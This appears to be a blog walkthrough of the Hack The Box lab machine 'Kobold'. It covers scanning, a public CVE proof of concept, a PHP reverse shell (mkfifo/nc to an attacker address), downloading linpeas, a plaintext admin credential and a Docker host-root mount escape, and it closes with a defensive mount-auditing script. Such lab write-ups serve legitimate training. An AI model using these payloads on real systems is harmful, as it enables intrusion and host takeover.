[Penetration Testing] HTB Season 10 Kobold full walkthrough

Kobold

Information gathering

┌──(root㉿kali)-[~]
└─# nmap -A -T4 10.129.56.218
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-22 05:26 EDT
Nmap scan report for 10.129.56.218
Host is up (0.32s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 8c:45:12:36:03:61:de:0f:0b:2b:c3:9b:2a:92:59:a1 (ECDSA)
|_  256 d2:3c:bf:ed:55:4a:52:13:b5:34:d2:fb:8f:e4:93:bd (ED25519)
80/tcp  open  http     nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to https://kobold.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to https://kobold.htb/
| ssl-cert: Subject: commonName=kobold.htb
| Subject Alternative Name: DNS:kobold.htb, DNS:*.kobold.htb
| Not valid before: 2026-03-15T15:08:55
|_Not valid after:  2125-02-19T15:08:55
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   http/1.1
|   http/1.0
|_  http/0.9
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   312.45 ms 10.10.16.1
2   179.65 ms 10.129.56.218

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.47 seconds

Subdomain enumeration turned up mcp.kobold.htb.

Exploitation (CVE-2026-23744)

git clone https://github.com/H1sok444/CVE-2026-23744-PoC
Change the listener IP and port in the script, then run it:
python exploit.py mcp.kobold.htb

python3 -c 'import pty;pty.spawn("/bin/bash")'

This gives user.txt.

Privilege escalation

First, a round of enumeration:

wget http://10.10.16.5/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

This revealed a new subdomain, bin:

bin.kobold.htb

https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-g2j9-g8r5-rg82

cd /privatebin-data/data
echo '<?php phpinfo();?>' > pwn.php

Construct the reverse shell script:
echo '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 172.17.0.1 9001 >/tmp/f");?>' > pwn4.php

template=../data/pwn4

But nothing exploitable seemed to come of this.

In /srv/cfg/conf.php inside the Docker container:

Back on the mcp subdomain, port 3552:

arcane/ComplexP@sswordAdmin1928

Create an image:

Mount the host's root directory / in its entirety at /app inside the container.

Then create it.
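
The last escalation step works because the container can bind-mount the host's / at /app. As an added defender-side check (not part of this writeup or of any tool it uses), the following Python script parses `docker inspect` JSON and flags bind mounts of sensitive host paths; the sample inspect output and container names are constructed for the demonstration.

```python
import json
from typing import List, Optional

# Host paths that should never be bind-mounted into a container. "/" is matched
# exactly; every other entry also matches any path beneath it.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/var/run/docker.sock")


def _sensitive(src: str) -> Optional[str]:
    """Return the sensitive host path that `src` exposes, or None."""
    src = src.rstrip("/") or "/"
    for p in SENSITIVE_HOST_PATHS:
        if p == "/":
            if src == "/":
                return p
        elif src == p or src.startswith(p + "/"):
            return p
    return None


def risky_mounts(inspect_json: str) -> List[dict]:
    """Parse `docker inspect` output and report bind mounts of sensitive host paths."""
    findings = []
    for c in json.loads(inspect_json):
        name = c.get("Name", "").lstrip("/")
        privileged = bool(c.get("HostConfig", {}).get("Privileged", False))
        for m in c.get("Mounts", []):
            if m.get("Type") != "bind":  # named volumes live under /var/lib/docker
                continue
            hit = _sensitive(m.get("Source", ""))
            if hit:
                findings.append({"container": name, "source": m["Source"],
                                 "destination": m.get("Destination"),
                                 "rw": bool(m.get("RW", True)),
                                 "privileged": privileged, "matched": hit})
    return findings


# Constructed sample in the shape `docker inspect` prints (not a capture from the box).
SAMPLE_INSPECT = json.dumps([
    {"Name": "/privatebin", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/srv/cfg", "Destination": "/srv/cfg", "RW": False}]},
    {"Name": "/escape", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/app", "RW": True},
                {"Type": "volume", "Source": "/var/lib/docker/volumes/x/_data",
                 "Destination": "/data", "RW": True}]},
])

if __name__ == "__main__":
    for f in risky_mounts(SAMPLE_INSPECT):
        print(f"[!] {f['container']}: host {f['source']} -> {f['destination']} "
              f"({'rw' if f['rw'] else 'ro'}{', privileged' if f['privileged'] else ''})")
```

Feed it real output with `docker inspect $(docker ps -q)`; on a host that lets unprivileged users reach the Docker API, the mount source is the control to audit, because a writable mount of / makes the container boundary meaningless.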

posted @ 2026-03-25 14:29  dynasty_chenzi  views (291)  comments (0)